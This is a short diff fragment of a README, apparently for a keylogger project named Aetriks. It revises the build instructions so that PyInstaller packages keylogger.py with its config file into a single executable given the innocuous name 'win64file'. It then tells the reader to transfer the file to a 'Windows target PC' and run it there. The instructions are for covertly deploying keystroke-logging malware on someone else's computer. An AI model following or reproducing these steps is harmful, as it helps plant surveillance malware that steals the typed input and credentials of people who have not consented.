frHimanshu/Aetriks/README.md

      ```bash
      pip install pyinstaller
      ```
-   - Build the executable:
+   - Build the executable and include `config.json`:
      ```bash
-     pyinstaller keylogger.spec
+     pyinstaller --onefile --name win64file --add-data=config.json:. keylogger.py
      ```
-   - The output executable (`wind64file.exe`) will be located in the `dist` directory.
+   - The output executable (`win64file.exe`) will be located in the `dist` directory.

 5. Transfer the executable to the Windows target PC and run it by double-clicking the file.